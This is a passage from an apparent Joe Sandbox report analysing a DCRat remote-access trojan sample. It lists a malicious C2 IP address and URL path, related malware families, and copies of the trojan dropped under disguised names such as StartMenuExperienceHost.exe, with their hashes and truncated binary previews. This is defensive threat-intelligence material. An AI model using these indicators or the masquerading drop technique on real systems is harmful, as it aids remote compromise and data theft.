00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                                                              		high

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              86.110.194.28
                                                                                                                                              		unknownRussian Federation
                                                                                                                                              		208861RACKTECHRUtrue

                                                                                                                                              Private

                                                                                                                                              IP
                                                                                                                                              127.0.0.1

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1583651
                                                                                                                                              Start date and time:2025-01-03 09:06:05 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 9m 28s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:23
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:zZ1Y43bxxV.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:cdac978772a7616686c0efe2727ce902.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@27/377@0/2
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 28.6%
                                                                                                                                              HCA Information:Failed
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                              Warnings

                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1012 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2916 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4192 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6036 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              03:06:59API Interceptor161x Sleep call for process: powershell.exe modified
                                                                                                                                              03:07:13API Interceptor490377x Sleep call for process: wnWNWNYIxJtFiUSDRXunzX.exe modified
                                                                                                                                              03:07:15API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              86.110.194.28updIMdPUj8.exeGet hashmaliciousDCRatBrowse
                                                                                                                                              • 86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              RACKTECHRUupdIMdPUj8.exeGet hashmaliciousDCRatBrowse
                                                                                                                                              • 86.110.194.28
                                                                                                                                              jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 91.223.144.119
                                                                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 193.38.236.134
                                                                                                                                              oyCvLcfl3R.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                              • 194.113.106.81
                                                                                                                                              qsKo.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.113.106.180
                                                                                                                                              GsrDwm0DJG.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.113.106.180
                                                                                                                                              HeggBkMoYE.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.113.106.180
                                                                                                                                              b2J6hgvd51.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 45.128.232.191
                                                                                                                                              TbFoReHi2v.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 45.128.232.235
                                                                                                                                              gmA11dfzc2.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 45.128.232.235

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              C:\Users\user\Desktop\ASylWHNt.logVqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                updIMdPUj8.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                  t8F7Ic986c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                            U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                              voed9G7p5s.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\a903aeb2e41cb9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):277
                                                                                                                                                                  Entropy (8bit):5.765969487176301
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:TSLgMhL3yWhUBxvnvxrpkAaAx2vojRIih9f3KH0uzbn:TSLgYCWhMvoVvn06H1
                                                                                                                                                                  MD5:D708EB51AD6D51C081AA623B0EF3EA04
                                                                                                                                                                  SHA1:97E0BE4395FFF7184B1D0A1C5332AED0509534CC
                                                                                                                                                                  SHA-256:7CB0F270935C996425E8289DC3FE98EBE8622B5B7BF355D8C3BCABEB2CCACA36
                                                                                                                                                                  SHA-512:A7060C11EB8E51F0E8FCF3D7EFF307D8660212356CECE6CE7626FA47312CEA0DD654C529D6CD841C5F090E24E1C9643885D3B5A4B7A21A4B13A7E6DBC4BEB31F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:W32djJ5bf2K61EnyVT4l2k7RqIF8wGhM86rNuIIByE6wdjknj8pKOGYv6lwbE6pZU775XaDMK3wxoKyHhcZxaW72i5RJWr72ZgbfloQJ4d9VTkHvwo4lh1979FXbI4zd54YHtTg2LQ36Xli7ygWrwVVhgeffRyBAnfaZM9CdIBaQ8CkXganlhHqki0lOxAlXP2T1LJuze3jv5Ejd3H81KZdfyz0VYxpHZCBFtsMXpyHoi5oeRHVqCuNzZxCVTZbqNcW2CduL5lMVRz73KVEQc

                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@...................................'.W.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H............,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\logs\55b276f4edf653

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (574), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):574
                                                                                                                                                                  Entropy (8bit):5.889778793019252
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:EBtepFg3ad9TS5f3tvULtlmOYpn+8h7rA9VY6:atr3P/elUp37rAk6
                                                                                                                                                                  MD5:870A5B2FAF1DDC9FCEADFA701578D5C2
                                                                                                                                                                  SHA1:9899B50AA171ECF4AB8555118FAEC617C004E2F1
                                                                                                                                                                  SHA-256:A34187AF0AAFA30C82AEC709F917606753B44E7904D7977F5399F69A6843C41E
                                                                                                                                                                  SHA-512:7292111078EC1AFCE6E076028E1C00BB40E8E8D52A2A744D9ECA8529C17C0379ECE2BF46FA6596893321BF204835887E596E894F47EAF2ECBB0455F94E644755
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:vbyWJuai1ik0JK7UKONXrD1xyfFg580Y1UZ3Q3SPoG8nFFgpH5NMNs2skBiop3m2sM8zvDEQ58tkFNrs8aZAunLJbqTPVnkudF53Hr3D07QO9RmWT0pOdlIEByXFuz5SY8GASykRhWKxW6KJD65e7VQ2701STyTBB80ALmEfPYrHbUrEoNBy3aUDrODc6R8tCIvYFJ8b1aPjnJamIxoFwfHlnxT6jli7Z8ETiT9eOk6cLuZiyaTJn26hAKuS0C1Q1RJpEGDzyK1Mioa2XuHJSZUhCgSYiqnLsqk3ludrXeVcBt8Vt14G4s7c6mnhyoQHhpe2DgRnRavxE1gSh6prvhRAsI78G52sNN5VPGRNkQze6JYEGUA19jVAYdK5jSgVhDk06KCbocHfswEiu22w5Ato257v5WnRtd72jhI5RiNhb0SlZmKqauagU58AMQfSyzvOzL8Nt6eWxLNBnWWTL719DaioiHtAC4tlEDvOn77dQDsIs6Xz4MG18wLYmTolNdU2cl7jkIqN9XtAsa6mu3G0y2nS2XlTTVPwtzpG9xPwf21kDLqMXB1TWdEk8o

                                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@...................................'.W.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H............,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\Program Files (x86)\Windows Sidebar\Gadgets\a903aeb2e41cb9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (468), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):468
                                                                                                                                                                  Entropy (8bit):5.865978360864279
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:puCaTdPyhNBUZwPgSH/8HYgwl7F6WXbiGs8JA3fl/uH3SWestD/3Rnnw86r/7TcH:ylyRoex0DUJsHZi2KnwD7mJ1n
                                                                                                                                                                  MD5:9C5D166543FE426D9D2DDA8DBFEF3C9D
                                                                                                                                                                  SHA1:20C380C3835A4F84DA9FB5DA14894F25429E4C74
                                                                                                                                                                  SHA-256:D444427416516FB94CF730562406CF4C1E1E1BF94C3DDB89FD6118FA62DD6583
                                                                                                                                                                  SHA-512:C0A9E89646F7F7DA8B1A701DB88D45A8FE09FD9EEA5D4958C3F1B9EB9F7B5586450737475386E92CFF93FCED8D85F8D25E31D1AEC7B918EB53178FA1A09FE197
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:oU4tMBZccNqgg1edbsoKNas4S1e21V6pumhavWt6cGxjiGbNMwUNefPNlAbVhgkHRBw3UEsE8srGnJVMZRqFAtKPXTyu5YZ6gqShTi2IDPOwxJjcpO5P0fGi0gfAP7JkTvj71x21YiBueYcOtWFqcJGBjtrxC22GFocBjmk1WE1RdWDbERQ32dHJpiXHGFygp5o05bpGwOUYSyhNqPtvl9OmgTVAPcvRPVmirMfmlJGoJt11BJb0WD4pqCUmFp1TdDJ7L8gdtGJb2kcxbd8FB44La71o23h6SxLGj4qCn7HP4cwGjgKmqvRiI7gOH1k0jMJFZWNhx6cExpR7KvFWs4Qgfm8mXc5wWQqrSrrMTnytTNvdpiDVvOIo6njwYlKVAqrg8kodD2CFFgNS0e6yZjAHICupH4yscdtnfPeF3jS3MCiaZQ63oW5bpkX5z9VIEUmlxkxl914zRG5GdUQ1

                                                                                                                                                                  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@...................................'.W.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H............,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\Program Files\Internet Explorer\a903aeb2e41cb9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (619), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):619
                                                                                                                                                                  Entropy (8bit):5.900053593710004
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:BXU6TZSzdKKcwqM8z+aGnFYcodn3jnAH9ou2bGvJMhNWy5X292kyvg:C6TZSBGki+aQ3A3LAH9ot+M9J2jyI
                                                                                                                                                                  MD5:9155B87D1981B891E687F8CFD5FCE9F7
                                                                                                                                                                  SHA1:98ACDBD626D1BF40B5E8E7EA6AC6A9FABD4FD5F1
                                                                                                                                                                  SHA-256:1C15A10EA852CB4330E2C76FA9DEC026E148DA61D51900990E410065E4B32D51
                                                                                                                                                                  SHA-512:13762BBA2680DB24817C06649A79994624162763BC2BD5E743C0673C0778F7DC190236E604B6C24403B5A4E2AE31DEBBE325E45A909AF580374A2D1AE9F2A213
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:nh1SdQwmVsB21pnqbaRpJfcs5HWJmU7jHguAEtQTOLxSmYNoxisszfcHFJWV3mABubuV4mmsJ8a8sJFh3sVDlPumDn54W4ZlKwiKo2tL5Ai0EeZ5EzbLQ6ZeqIRRqrWOiyx5l42B8JIlr3hjNA0gcNUOWDegkcfNnTSPqdTJ7aNGyyxwksDp10vVdijiaWbfo47YlR2trrjCANahQr51ZzWxh6vH4vtk9rc31ZKS0T8KQtVQIBRtajGyhJ0pfuz588DSvgq1gmBF1Mhylf93d9JaloWrifxFdCMSpCelUaMxhA6UmCD9v6c8ynrHK8SAz5lzAOIjBXiCwV2krBFgcxUhjNdCVXbVIM8lYHUX3e8XYZLcuGZI3whClEPwvFOn5M4kXQLjrrm8y6JJCARO7TcVo5AU2hmxQUcLfkFd50aLJjNp5Ftuy9qmui5bQ0rKFysde7ob5xSH2QLFsVZwx29Qoza6pnNEIQGV0tK7bSyArjueWzt5b5WMyczphswSkO8lJ0O8KcVfE9jFF6j03RnM34gY4fatgfZdkIUgkuu8k1Hz3ujkI6YSkvsPU0EpCm9ijGe6mDPJgomCwqfJ5zkjGH2yaFLuqF681jPwPm8

                                                                                                                                                                  C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.......(...@...................................'.W.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H............,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                  C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
